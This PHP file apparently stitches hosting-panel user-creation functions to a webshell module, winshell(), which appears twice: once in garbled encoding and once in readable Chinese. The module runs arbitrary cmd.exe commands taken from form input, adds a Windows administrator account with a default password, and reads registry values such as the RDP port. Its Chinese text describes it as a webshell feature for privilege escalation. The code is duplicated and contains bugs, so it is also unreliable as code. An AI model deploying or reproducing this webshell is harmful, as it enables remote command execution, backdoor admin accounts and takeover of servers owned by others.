function os_create_system_user($basename, $password, $id, $shell, $dir = "/tmp")
{
$uobj = new COM("WinNT://.");
try {
$user = new COM("WinNT://./{$basename}");
} catch (exception $e) {
$user = $uobj->create("user", $basename);
}
$user->setPassword($password);
$user->setInfo();
}
function createUser()
{
global $gbl, $sgbl, $login, $ghtml;
$mn = $this->main;
$passwd = $mn->password;
$parentname = $mn->getParentName();
//lxfile_mkdir("c:/webroot/home/root/hell");
print "creatinguser\n";
$obj = new COM("WinNT://.");
try {
$user = new COM("WinNT://./{$this->main->nname}");
dprint("description\n");
dprint($user->Description);
dprint("\n");
if ($user->Description === uuser::getUserDescription($this->main->getParentName())) {
return true;
} else {
throw new lxexception("user_exists", 'web_s_uuser_nname', $this->main->nname);
}
} catch (exception $e) {
$user = $obj->create("user", $this->main->nname);
$user->HomeDirectory = convertTobackSlash("c:/webroot/{$parentname}/{$parentname}");
//$user->Put("HomeDirDrive", "c:");
}
try {
$user->setInfo();
} catch (exception $e) {
log_error("User Couldn't be created");
throw new lxexception("user_exists", 'web_s_uuser_nname', $this->main->nname);
}
//$obj->AccountDisabled = true;
$grp = new COM("WinNT://./Users");
$grp->Add("WinNT://{$this->main->nname}");
$user->setPassword($this->main->realpass);
$user->Description = uuser::getUserDescription($this->main->getParentName());
$user->setInfo();
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("����Shell.Wscript����ʧ��");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users�������ӹ���Ա<br><br>
{$nop}�½��û�����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()������ȡע��������(Shell.Wscript����)<br><br>
ע����·����<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="��ȡ����" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("����Shell.Wscript����ʧ��");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '����: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "�ݲ��Ա����ܿ��õĿ�����Ϊ����֮һ<br>Webshell���ڷ���������ΪWindowsϵͳ<br>PHP��Ȩ����������ڷdz����ε�ʱ�����Գ��Ա�����<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Wscript������<br>
Wscript����cmd��������<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User���� ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.user����<br>
USER����ΪWindowsϵͳ�û�������������<br>{$tip}<a href="?s=jk&winshell=regedit"> [ ע������ȡ ] </a><br><br>
<h5>������ʹ��PHP����Windows�����е�Shell.Wscript����<br>
RegRead()������ȡϵͳע��������<br>{$tip}</pre></div>
END;
}
}
function winshell()
{
$nop = ' ';
if ($_GET['winshell'] == 'wscript') {
$wcmd = $_POST['wcmd'] ? $_POST['wcmd'] : 'net user';
$wcpth = $_POST['wcpth'] ? $_POST['wcpth'] : 'cmd.exe';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=wscript" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD路径<br />
{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="执行" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$ww = $wcpth . " /c " . $wcmd;
$phpwsh = new COM("Wscript.Shell") or die("创建Shell.Wscript组件失败");
$phpexec = $phpwsh->exec($ww);
$execoutput = $wshexec->stdout();
$result = $execoutput->readall();
echo $result;
@$phpwsh->Release();
$phpwsh = NULL;
}
} elseif ($_GET['winshell'] == 'shelluser') {
$wuser = $_POST['wuser'] ? $_POST['wuser'] : '******';
$wpasw = $_POST['wpasw'] ? $_POST['wpasw'] : '1234@silic#';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=shelluser" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
Shell.Users组件添加管理员<br><br>
{$nop}新建用户名:<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>
{$nop}新用户密码:<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>
<input type="submit" value="添加" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] = 'do') {
$shell = new COM("Shell.Users");
$cmd = $shell->create($wuser);
$cmd->changePassword($wpasw, "");
$cmd->setting["AccountType"] = 3;
}
} elseif ($_GET['winshell'] == 'regedit') {
$regpath = $_POST['regpath'] ? $_POST['regpath'] : 'HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber';
print <<<END
<div class="actall">
<form action="?s=jk&winshell=regedit" method="POST">
<input type="hidden" name="do" id="do" value="do"><br>
RegRead()函数读取注册表内容(Shell.Wscript组件)<br><br>
注册表路径:<br>
{$nop}<input type="text" name="regpath" id="regpath" value="{$regpath}" style="width:720px;"><br><br>
<input type="submit" value="读取内容" style="width:80px;">
<br><br><br></form></div>
END;
if ($_POST['do'] == 'do') {
$shell = new COM("WScript.Shell") or die("创建Shell.Wscript组件失败");
try {
$registry_proxystring = $shell->RegRead($regpath);
} catch (Exception $e) {
echo '内容: ' . $e->getMessage();
}
echo $registry_proxystring;
}
} else {
$tip = "据测试本功能可用的可能性为万分之一<br>Webshell所在服务器必须为Windows系统<br>PHP提权很灵活,但你在非常无奈的时候可以尝试本功能<br></h5><br><br><br>";
print <<<END
<div class="actall"><pre>
<br><a href="?s=jk&winshell=wscript"> [ WScript组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Wscript组件。<br>
Wscript为调用cmd命令组件<br>{$tip}<a href="?s=jk&winshell=shelluser"> [ Shell.User组件 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.user组件<br>
USER组件为Windows系统用户操作相关组件<br>{$tip}<a href="?s=jk&winshell=regedit"> [ 注册表读取 ] </a><br><br>
<h5>本功能使用PHP调用Windows组件中的Shell.Wscript组件<br>
RegRead()函数读取系统注册表内容<br>{$tip}</pre></div>
END;
}
}
